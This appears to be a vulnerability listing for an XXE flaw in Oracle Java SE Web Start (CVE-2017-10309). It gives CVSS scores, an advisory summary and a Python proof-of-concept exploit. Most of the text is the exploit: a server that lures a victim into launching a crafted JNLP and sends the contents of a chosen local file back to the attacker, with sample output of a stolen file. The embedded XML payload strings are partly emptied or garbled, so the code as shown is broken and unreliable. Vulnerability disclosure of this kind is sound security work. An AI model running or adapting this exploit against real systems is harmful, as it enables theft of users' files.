Steven Seeley (mr_me) of Source InciteSRC-2017-0028SRC-2017-0028 : Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability
7.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.008 Low
EPSS
Percentile
81.7%
Vulnerability Details:
This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Oracle Java SE. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the processing of JNLP files. The issue lies in the failure to properly restrict the use of XML External Entity (XXE) references. A specially crafted JNLP file can cause the XML parser to access the contents of an external entity and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose sensitive information under the context of the current process.
Affected Vendors:
Oracle
Affected Products:
Java SE
Vendor Response:
Oracle has issued an update to correct these vulnerabilities. More details can be found at:
<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>
#!/usr/local/bin/python
"""
Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability
Affected: <= v8u131
File: jre-8u131-windows-i586-iftw.exe
SHA1: 85f0de19845deef89cc5a29edebe5bb33023062d
Download: http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html
References: SRC-2017-0028 / CVE-2017-10309
Advisory: https://srcincite.io/advisories/src-2017-0028/
Vulnerability Details:
======================
Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" 'C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'.
This can allow allow an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE attack can be leveraged to disclose files, cause a denial of service or trigger SSRF.
Notes:
======
- It will take a few seconds to fire.
- Some browsers will give a small, innocent looking popup (not a security alert), but IE/Edge doesn't at all.
Example:
========
saturn:~ mr_me$ ./poc.py
Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
mr_me 2017
(+) usage: ./poc.py(+) eg: ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
saturn:~ mr_me$ ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
mr_me 2017
(+) select your interface: lo0, gif0, stf0, en0, en1, en2, bridge0, p2p0, awdl0, vmnet1, vmnet8, tap0: vmnet8
(+) starting xxe server...
(+) have someone with Java SE installed visit: http://172.16.175.1:9090/
(!) firing webstart...
(!) downloading jnlp...
(!) downloading si.xml...
(+) stolen: Please%20refer%20to%20http://java.com/licensereadme
^C(+) shutting down the web server
saturn:~ mr_me$
"""
import sys
import socket
import fcntl
import struct
from random import choice
from string import lowercase
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
try:
import netifaces as ni
except:
print "(-) try 'pip install netifaces'"
sys.exit(1)
class xxe(BaseHTTPRequestHandler):
# stfu
def log_message(self, format, *args):
return
def do_GET(self):
if "leaked" in self.path:
print "(+) stolen: %s" % self.path.split("?")[1]
self.send_response(200)
self.end_headers()
elif self.path == "/":
print "(!) firing webstart..."
self.send_response(200)
self.end_headers()
message = """""" % (ip, path)
self.wfile.write(message)
self.wfile.write('\n')
elif "si.xml" in self.path:
print "(!) downloading si.xml..."
self.send_response(200)
self.end_headers()
message = """
">
""" % (file, ip)
self.wfile.write(message)
self.wfile.write('\n')
elif path in self.path:
print "(!) downloading jnlp..."
self.send_response(200)
self.end_headers()
message = """%%sp;
%%param1;
%%exfil;
]>
""" % ip
self.wfile.write(message)
self.wfile.write('\n')
return
def banner():
return """\n\tOracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability\n\tmr_me 2017\n"""
if __name__ == '__main__':
print banner()
if len(sys.argv) != 2:
print "(+) usage: %s" % sys.argv[0]
print "(+) eg: %s 'C:/Program Files/Java/jre1.8.0_131/README.txt'" % sys.argv[0]
sys.exit(1)
file = sys.argv[1]
# randomize incase we change payloads and browser caches
path = "".join(choice(lowercase) for i in range(10))
path += ".jnlp"
# interfaces
ints = ""
for i in ni.interfaces(): ints += "%s, " % i
interface = raw_input("(+) select your interface: %s: " % ints[:-2])
# get the ip from the interface
try:
ip = ni.ifaddresses(interface)[2][0]['addr']
except:
print "(-) no ip address associated with that interface!"
sys.exit(1)
try:
server = HTTPServer(('0.0.0.0', 9090), xxe)
print '(+) starting xxe server...'
print '(+) have someone with Java SE installed visit: http://%s:9090/' % ip
server.serve_forever()
except KeyboardInterrupt:
print '(+) shutting down the web server'
server.socket.close()Related
7.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.008 Low
EPSS
Percentile
81.7%